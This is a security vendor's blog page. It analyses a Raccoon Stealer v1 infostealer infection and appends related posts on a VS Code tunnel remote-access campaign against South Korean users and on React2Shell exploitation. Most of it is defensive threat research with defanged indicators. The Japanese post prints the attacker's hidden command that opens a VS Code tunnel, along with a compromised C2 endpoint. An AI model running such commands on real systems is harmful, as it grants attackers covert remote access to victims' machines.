November 7, 2022

[Part 1] Analysis of a Raccoon Stealer v1 Infection

Darktrace’s SOC team observed a fast-paced compromise involving Raccoon Stealer v1. See which steps the Raccoon Stealer v1 took to extract company data!

Written by

Mark Turner

SOC Shift Supervisor

Written by

Sam Lister

Specialist Security Researcher

Inside the SOC

Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.

Written by

Mark Turner

SOC Shift Supervisor

Written by

Sam Lister

Specialist Security Researcher

Nov 2022

Introduction

Towards the end of March 2022, the operators of Raccoon Stealer announced the closure of the Raccoon Stealer project [1]. In May 2022, Raccoon Stealer v2 was unleashed onto the world, with huge numbers of cases being detected across Darktrace’s client base. In this series of blog posts, we will follow the development of Raccoon Stealer between March and September 2022. We will first shed light on how Raccoon Stealer functioned before its demise, by providing details of a Raccoon Stealer v1 infection which Darktrace’s SOC saw within a client network on the 18^th March 2022. In the follow-up post, we will provide details about the surge in Raccoon Stealer v2 cases that Darktrace’s SOC has observed since May 2022.

What is Raccoon Stealer?

The misuse of stolen account credentials is a primary method used by threat actors to gain initial access to target environments [2]. Threat actors have several means available to them for obtaining account credentials. They may, for example, distribute phishing emails which trick their recipients into divulging account credentials. Alternatively, however, they may install information-stealing malware (i.e, info-stealers) onto users’ devices. The results of credential theft can be devastating. Threat actors may use the credentials to gain access to an organization’s SaaS environment, or they may use them to drain users’ online bank accounts or cryptocurrency wallets.

Raccoon Stealer is a Malware-as-a-Service (MaaS) info-stealer first publicized in April 2019 on Russian-speaking hacking forums.

Figure 1: One of the first known mentions of Raccoon Stealer on a Russian-speaking hacking forum named ‘Hack Forums’ on the 13th April 2019

The team of individuals behind Raccoon Stealer provide a variety of services to their customers (known as ‘affiliates’), including access to the info-stealer, an easy-to-use automated backend panel, hosting infrastructure, and 24/7 customer support [3].

Once Raccoon Stealer affiliates gain access to the info-stealer, it is up to them to decide how to distribute it. Since 2019, affiliates have been observed distributing the info-stealer via a variety of methods, such as exploit kits, phishing emails, and fake cracked software websites [3]/[4]. Once affiliates succeed in installing Raccoon Stealer onto target systems, the info-stealer will typically seek to obtain sensitive information saved in browsers and cryptocurrency wallets. The info-stealer will then exfiltrate the stolen data to a Command and Control (C2) server. The affiliate can then use the stolen data to conduct harmful follow-up activities.

Towards the end of March 2022, the team behind Raccoon Stealer publicly announced that they would be suspending their operations after one of their core developers was killed during the Russia-Ukraine conflict [5].

Figure 2: Raccoon Stealer resignation post on March 25th 2022

Recent details shared by the US Department of Justice [6]/[7] indicate that it was in fact the arrest, rather than the death, of a key Raccoon Stealer operator which led the Raccoon Stealer team to suspend their operations [8].

The closure of the Raccoon Stealer project, which ultimately resulted from the FBI-backed dismantling of Raccoon Stealer’s infrastructure in March 2022, did not last long, with the completion of Raccoon Stealer v2 being announced on the Raccoon Stealer Telegram channel on the 17^th May 2022 [9].

Figure 3: Telegram post about new version of Raccoon Stealer

In the second part of this blog series, we will provide details of the recent surge in Raccoon Stealer v2 activity. In this post, however, we will provide insight into how the old version of Raccoon Stealer functioned just before its demise, by providing details of a Raccoon Stealer v1 infection which occurred on the 18^th March 2022.

Attack Details

On the 18^th March, at around 13:00 (UTC), a user’s device within a customer’s network was seen contacting several websites providing fake cracked software.

Figure 4: The above figure — obtained from the Darktrace Event Log for the infected device — highlights its connections to cracked software websites such as ‘licensekeysfree[.]com’ and ‘hdlicense[.]com’ before contacting ‘lion-files[.]xyz’ and ‘www.mediafire[.]com’

The user’s attempt to download cracked software from one of these websites resulted in their device making an HTTP GET request with a URI string containing ‘autodesk-revit-crack-v2022-serial-number-2022’ to an external host named ‘lion-filez[.]xyz’

Figure 5: Screenshot from hdlicense[.]com around the time of the infection shows a “Download” button linking to the ‘lion-filez[.]xyz’ endpoint

The device’s HTTP GET request to lion-filez[.]xyz was immediately followed by an HTTPS connection to the file hosting service, www.mediafire[.]com. Given that threat actors are known to abuse platforms such as MediaFire and Discord CDN to host their malicious payloads, it is likely that the user’s device downloaded the Raccoon Stealer v1 sample over its HTTPS connection to www.mediafire[.]com.

After installing the info-stealer sample, the user’s device was seen making an HTTP GET request with the URI string ‘/g_shock_casio_easy’ to 194.180.191[.]185. The endpoint responded to the request with data related to a Telegram channel named ‘G-Shock’.

Figure 6: Telegram channel ‘@g_shock_casio_easy’

The returned data included the Telegram channel’s description, which in this case, was a base64 encoded and RC4 encrypted string of characters [10]/[11]. The Raccoon Stealer sample decoded and decrypted this string of characters to obtain its C2 IP address, 188.166.49[.]196. This technique used by Raccoon Stealer v1 closely mirrors the espionage method known as ‘dead drop’ — a method in which an individual leaves a physical object such as papers, cash, or weapons in an agreed hiding spot so that the intended recipient can retrieve the object later on without having to come in to contact with the source. In this case, the operators of Raccoon Stealer ‘left’ the malware’s C2 IP address within the description of a Telegram channel. Usage of this method allowed the operators of Raccoon Stealer to easily change the malware’s C2 infrastructure.

After obtaining the C2 IP address from the ‘G-Shock’ Telegram channel, the Raccoon Stealer sample made an HTTP POST request with the URI string ‘/’ to the C2 IP address, 188.166.49[.]196. This POST request contained a Windows GUID, a username, and a configuration ID. These details were RC4 encrypted and base64 encoded [12]. The C2 server responded to this HTTP POST request with JSON-formatted configuration information [13], including an identifier string, URL paths for additional files, along with several other fields. This configuration information was also concealed using RC4 encryption and base64 encoding.

Figure 7- Fields within the JSON-formatted configuration data [13]

In this case, the server’s response included the identifier string ‘hv4inX8BFBZhxYvKFq3x’, along with the following URL paths:

/l/f/hv4inX8BFBZhxYvKFq3x/77d765d8831b4a7d8b5e56950ceb96b7c7b0ed70
/l/f/hv4inX8BFBZhxYvKFq3x/0cb4ab70083cf5985b2bac837ca4eacb22e9b711
/l/f/hv4inX8BFBZhxYvKFq3x/5e2a950c07979c670b1553b59b3a25c9c2bb899b
/l/f/hv4inX8BFBZhxYvKFq3x/2524214eeea6452eaad6ea1135ed69e98bf72979

After retrieving configuration data, the user’s device was seen making HTTP GET requests with the above URI strings to the C2 server. The C2 server responded to these requests with legitimate library files such as sqlite3.dll. Raccoon Stealer uses these libraries to extract data from targeted applications.

Once the Raccoon Stealer sample had collected relevant data, it made an HTTP POST request with the URI string ‘/’ to the C2 server. This posted data likely included a ZIP file (named with the identifier string) containing stolen credentials [13].

The observed infection chain, which lasted around 20 minutes, consisted of the following steps:

1. User’s device installs Raccoon Stealer v1 samples from the user attempting to download cracked software

2. User’s device obtains the info-stealer’s C2 IP address from the description text of a Telegram channel

3. User’s device makes an HTTP POST request with the URI string ‘/’ to the C2 server. The request contains a Windows GUID, a username, and a configuration ID. The response to the request contains configuration details, including an identifier string and URL paths for additional files

4. User’s device downloads library files from the C2 server

5. User’s device makes an HTTP POST request with the URI string ‘/’ to the C2 server. The request contains stolen data

Darktrace Coverage

Although RESPOND/Network was not enabled on the customer’s deployment, DETECT picked up on several of the info-stealer’s activities. In particular, the device’s downloads of library files from the C2 server caused the following DETECT/Network models to breach:

Anomalous File / Masqueraded File Transfer
Anomalous File / EXE from Rare External Location
Anomalous File / Zip or Gzip from Rare External Location
Anomalous File / EXE from Rare External Location
Anomalous File / Multiple EXE from Rare External Locations

Figure 8: Event Log for the infected device shows 'Anomalous File / Masqueraded File Transfer' model breach after the device's download of a library file from the C2 server

Since the customer was subscribed to the Darktrace Proactive Threat Notification (PTN) service, they were proactively notified of the info-stealer’s activities. The quick response by Darktrace’s 24/7 SOC team helped the customer to contain the infection and to prevent further damage from being caused. Having been alerted to the info-stealer activity by the SOC team, the customer would also have been able to change the passwords for the accounts whose credentials were exfiltrated.

If RESPOND/Network had been enabled on the customer’s deployment, then it would have blocked the device’s connections to the C2 server, which would have likely prevented any stolen data from being exfiltrated.

Conclusion

Towards the end of March 2022, the team behind Raccoon Stealer announced that they would be suspending their operations. Recent developments suggest that the arrest of a core Raccoon Stealer developer was responsible for this suspension. Just before the Raccoon Stealer team were forced to shut down, Darktrace’s SOC team observed a Raccoon Stealer infection within a client’s network. In this post, we have provided details of the network-based behaviors displayed by the observed Raccoon Stealer sample. Since these v1 samples are no longer active, the details provided here are only intended to provide historical insight into the development of Raccoon Stealer’s operations and the activities carried out by Raccoon Stealer v1 just before its demise. In the next post of this series, we will discuss and provide details of Raccoon Stealer v2 — the new and highly prolific version of Raccoon Stealer.

Thanks to Stefan Rowe and the Threat Research Team for their contributions to this blog.

References

[1] https://twitter.com/3xp0rtblog/status/1507312171914461188

[2] https://www.gartner.com/doc/reprints?id=1-29OTFFPI&ct=220411&st=sb

[3] https://www.cybereason.com/blog/research/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block

[4] https://www.cyberark.com/resources/threat-research-blog/raccoon-the-story-of-a-typical-infostealer

[5] https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/

[6] https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation

[7] https://www.youtube.com/watch?v=Fsz6acw-ZJY

[8] https://riskybiznews.substack.com/p/raccoon-stealer-dev-didnt-die-in

[9] https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d

[10] https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/

[11] https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/

[12] https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer

[13] https://cyberint.com/blog/research/raccoon-stealer/

Appendices

Specialist Security Researcher

Inside the SOC

Written by

Mark Turner

SOC Shift Supervisor

Written by

Sam Lister

Specialist Security Researcher

Senior Director of Product, Cloud | Darktrace

Watch the NIS2 Webinar

Blog

Network

January 26, 2026

ダークトレース、韓国を標的とした、VS Codeを利用したリモートアクセス攻撃を特定

はじめに

ダークトレースのアナリストは、韓国のユーザーを標的とした、北朝鮮（DPRK）が関係していると思われる攻撃を検知しました。このキャンペーンはJavascriptEncoded（JSE）スクリプトと政府機関を装ったおとり文書を使ってVisual Studio Code（VS Code）トンネルを展開し、リモートアクセスを確立していました。

技術分析

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”. — 図1: 「2026年上半期国立大学院夜間プログラムの学生選抜に関する文書」という表題のおとり文書。

このキャンペーンで確認されたサンプルは、Hangul Word Processor （HWPX）文書に偽装したJSEファイルであり、スピアフィッシングEメールを使って標的に送付されたと考えられます。このJSEファイルは複数のBase64エンコードされたブロブを含み、Windows Script Hostによって実行されます。このHWPXファイルは“2026年上半期国立大学院夜間プログラムの学生選抜に関する文書(1)”という名前で、C:\ProgramDataにあり、おとりとして開かれます。この文書は韓国の公務員に関連する事務を管掌する政府機関、人事革新処を装ったものでした。文書内のメタデータから、脅威アクターは文書を本物らしくみせるため、政府ウェブサイトから文書を取得し、編集したと思われます。

Base64 encoded blob. — 図2: Base64エンコードされたブロブ

このスクリプトは次に、VSCode CLI ZIPアーカイブをMicrosoftからC:\ProgramDataへ、code.exe（正規のVS Code実行形式）およびout.txtという名前のファイルとともにダウンロードします。

隠されたウィンドウで、コマンドcmd.exe/c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene >"C:\ProgramData\out.txt" 2>&1 が実行され、 “bizeugene”という名前のVS Codeトンネルが確立されます。

VSCode Tunnel setup. — 図3: VSCode トンネルの設定

VS Codeトンネルを使うことにより、ユーザーはリモートコンピューターに接続してVisualStudio Codeを実行できます。リモートコンピューターがVS Codeサーバーを実行し、このサーバーはMicrosoftのトンネルサービスに対する暗号化された接続を作成します。その後ユーザーはGitHubまたはMicrosoftにサインインし、VS CodeアプリケーションまたはWebブラウザを使って別のデバイスからこのマシンに接続することができます。VS Codeトンネルの悪用は2023年に最初に発見されて以来、東南アジアのデジタルインフラおよび政府機関を標的とする[1]中国のAPT（AdvancedPersistent Threat）グループにより使用されています。

“out.txt” ファイルには、VS Code Serverログおよび生成されたGitHubデバイスコードが含まれています。脅威アクターがGitHubアカウントからこのトンネルを承認すると、VS Codeを使って侵害されたシステムに接続されます。これにより脅威アクターはこのシステムに対する対話型のアクセスが可能となり、VS Codeターミナルやファイルブラウザーを使用して、ペイロードの取得やデータの抜き出しが可能になります。

GitHub screenshot after connection is authorized. — 図5: 接続が承認された後のGitHub画面

このコード、およびトンネルトークン“bizeugene”が、POSTリクエストとしてhttps://www.yespp.co.kr/common/include/code/out.phpに送信されます。このコードは韓国にある正規のサイトですが、侵害されてC2サーバーとして使用されています。

まとめ

この攻撃で見られたHancom文書フォーマットの使用、政府機関へのなりすまし、長期のリモートアクセス、標的の選択は、過去に北朝鮮との関係が確認された脅威アクターの作戦パターンと一致しています。この例だけでは決定的なアトリビューションを行うことはできませんが、既存のDPRKのTTP（戦術、技法、手順）との一致は、このアクティビティが北朝鮮と関係を持つ脅威アクターから発生しているという確信を強めるものです。

また、このアクティビティは脅威アクターがカスタムマルウェアではなく正規のソフトウェアを使って、侵害したシステムへのアクセスを維持できる様子を示しています。VS Codeトンネルを使うことにより、攻撃者は専用のC2サーバーの代わりに、信頼されるMicrosoftインフラを使って通信を行うことができるのです。広く信頼されているアプリケーションの使用は、特に開発者向けツールがインストールされていることが一般的な環境では、検知をより困難にします。既知のマルウェアをブロックすることに重点を置いた従来型のセキュリティコントロールではこの種のアクティビティを識別することはできないかもしれません。ツール自体は有害なものではなく、多くの場合正規のベンダーによって署名されているからです。

作成：タラ・グールド（TaraGould）（マルウェア調査主任）
編集：ライアン・トレイル（Ryan Traill）（アナリストコンテンツ主任）

付録

侵害インジケータ (IoCs)

115.68.110.73 - 侵害されたサイトのIP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001- フィッシング: 添付ファイル

T1059- コマンドおよびスクリプトインタプリタ

T1204.002- ユーザー実行

T1027- ファイルおよび情報の難読化

T1218- 署名付きバイナリプロキシ実行

T1105- 侵入ツールの送り込み

T1090- プロキシ

T1041- C2チャネル経由の抜き出し

‍

参考資料

[1] https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

About the author

Blog

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.‍

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction. No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

About the author

Nathaniel Jones

VP, Security & AI Strategy, Field CISO

あなたのデータ × DarktraceのAI

唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ

デモを予約

Check out this article by Darktrace: [Part 1] Analysis of a Raccoon Stealer v1 Infection